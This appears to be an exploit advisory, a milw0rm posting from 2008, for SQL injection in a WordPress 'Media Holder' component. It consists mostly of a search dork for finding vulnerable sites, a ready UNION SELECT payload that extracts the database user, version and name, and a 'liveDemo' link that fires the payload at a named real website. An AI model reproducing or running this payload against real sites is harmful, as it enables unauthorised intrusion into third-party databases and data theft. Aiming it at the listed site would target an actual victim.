------------------------------------------------------------------- WordPress Media Holder (id) Sql injetion vulnerability! ------------------------------------------------------------------- ------------------------------------------------------------------- Author: boom3rang Greetz: H!tM@N - KHG - chs - redc00de! Site : www.khg-crew.ws - [Kosova Hackers Group!] ------------------------------------------------------------------- ------------------------------------------------------------------- Dork: mediaHolder.php?id ------------------------------------------------------------------- Exp: http://localHost/mediaHolder.php?id=[exploit] ------------------------------------------------------------------- exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- ------------------------------------------------------------------- liveDemo: http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- ------------------------------------------------------------------- ------------------------------------------------------------------- Proud 2 be Albanian Proud 2 be Muslim United States of Albania ------------------------------------------------------------------- # milw0rm.com [2008-10-26]